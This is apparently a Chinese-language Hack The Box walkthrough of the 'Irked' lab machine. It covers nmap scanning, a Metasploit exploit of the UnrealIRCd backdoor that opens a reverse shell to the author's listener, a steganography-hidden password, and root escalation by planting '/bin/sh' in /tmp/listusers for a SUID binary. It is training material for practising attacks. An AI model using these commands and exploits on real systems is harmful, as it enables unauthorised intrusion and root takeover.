Hackthebox - Irked
靶场信息
靶场类型
信息收集
Nmap
┌──(root💀lucifiel)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.117 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-29 10:23 CST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 49297/tcp status
| 100024 1 50541/udp status
| 100024 1 51791/udp6 status
|_ 100024 1 60368/tcp6 status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
49297/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/29%OT=22%CT=1%CU=32566%PV=Y%DS=2%DC=T%G=Y%TM=626B4C5
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 170.14 ms 10.10.14.1
2 170.23 ms 10.10.10.117
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.84 seconds
这边有一个 111 端口,看着像是 rpcbind 方面的漏洞,好像是缓冲区溢出相关的,使用 msf 检查试试
Metasploit
msf6 auxiliary(scanner/misc/sunrpc_portmapper) > show options
Module options (auxiliary/scanner/misc/sunrpc_portmapper):
Name Current Setting Required Description
---- --------------- -------- -----------
PROTOCOL tcp yes Protocol to use (Accepted: tcp, udp)
RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 111 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
设置好后去执行
msf6 auxiliary(scanner/misc/sunrpc_portmapper) > exploit
[+] 10.10.10.117:111 - SunRPC Programs for 10.10.10.117
================================
Name Number Version Port Protocol
---- ------ ------- ---- --------
rpcbind 100000 4 111 tcp
rpcbind 100000 3 111 tcp
rpcbind 100000 2 111 tcp
rpcbind 100000 4 111 udp
rpcbind 100000 3 111 udp
rpcbind 100000 2 111 udp
status 100024 1 50541 udp
status 100024 1 49297 tcp
[*] 10.10.10.117:111 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
扫描到了,但是无法利用成功,换个其他地方继续看
HTTP
Web 服务提示 IRC 可以正常工作,这里 6697、8067、65534 似乎都是 IRC 服务,去搜索一下 IRC 是什么东西
搜索 WIKI 发现,IRC 是一种应用层的协议,主要用于群体聊天,通常使用的端口是 6667 和 6697,正好我们这里有 6697
漏洞利用
msf6 > search Unreal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux)
1 exploit/windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32)
2 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
Interact with a module by name or index. For example info 2, use 2 or use exploit/unix/irc/unreal_ircd_3281_backdoor
使用 msf 搜到了一个脚本,去使用一下
msf6 > use 2
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
设置好 RHOSTS,然后执行
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.16.12
lhost => 10.10.16.12
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 10.10.16.12:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo SUUjSBbQaAoSC5R9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "SUUjSBbQaAoSC5R9\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.16.12:4444 -> 10.10.10.117:51640) at 2022-04-28 22:55:02 -0400
whoami&&id
ircd
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
接着使用 shell 进入 shell 模式
shell
python3 -c "import pty;pty.spawn('/bin/bash')"
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
有点奇怪,明明是 Linux 系统,djmardov 用户目录却是 Windows 的系统结构
在目录 /home/djmardov/Documents 中找到了 user.txt flag 文件,但是我们权限不够,还有一个 .backup 文件,我们有查看权限,看一下是什么
权限提升
User
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
我直接拿着这段密码去登录 djmardov 账户是不行的,提示失败
然后看着提示,这似乎是一段 steg 的编码,而我们又没有要解密的文件,这时候我想起来,密码一般会藏在哪?当然是图片里,而哪里有图片呢?HTTP 服务的主页有一张图片!
┌──(root💀kali)-[~/Desktop]
└─# steghide extract -sf irked.jpg 1 ⨯
Enter passphrase:
wrote extracted data to "pass.txt".
在这提示我们输入密码,刚才 .backup 里的密码就有用处了,输入密码后解压出来一个 pass.txt 文件
┌──(root💀kali)-[~/Desktop]
└─# cat pass.txt
Kab6h+m+bbp2J:HG
得到了密码
┌──(root💀kali)-[~/Desktop]
└─# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 28 04:38:52 2022 from 10.10.14.3
djmardov@irked:~$ whoami&&id
djmardov
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
成功提权到 user 用户
djmardov@irked:~/Documents$ cat user.txt
4a66a78b12dc0e661a59d3f5c0267a8e
成功拿到 user 权限的 flag 文件
权限提升
djmardov@irked:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
使用 find 查找一下特殊权限文件
找到了一个 /usr/bin/viewuser 文件,查看一下
djmardov@irked:/usr/bin$ ./viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2022-04-28 02:46 (:0)
djmardov pts/5 2022-04-28 23:22 (10.10.16.12)
/tmp/listusers: connect: Connection refused
发现这里似乎调用了一个 /tmp/listusers
向 /tmp/listusers 写入文件
echo "/bin/sh" > /tmp/listusers
接着执行 /usr/bin/viewuser
djmardov@irked:/tmp$ echo "/bin/sh" > /tmp/listusers
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2022-04-28 02:46 (:0)
djmardov pts/5 2022-04-28 23:52 (10.10.16.12)
# whoami&&id
root
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
成功提权到 root 权限
# cat /root/root.txt
8d8e9e8be64654b6dccc3bff4522daf3
成功拿到 root 权限的 flag 文件
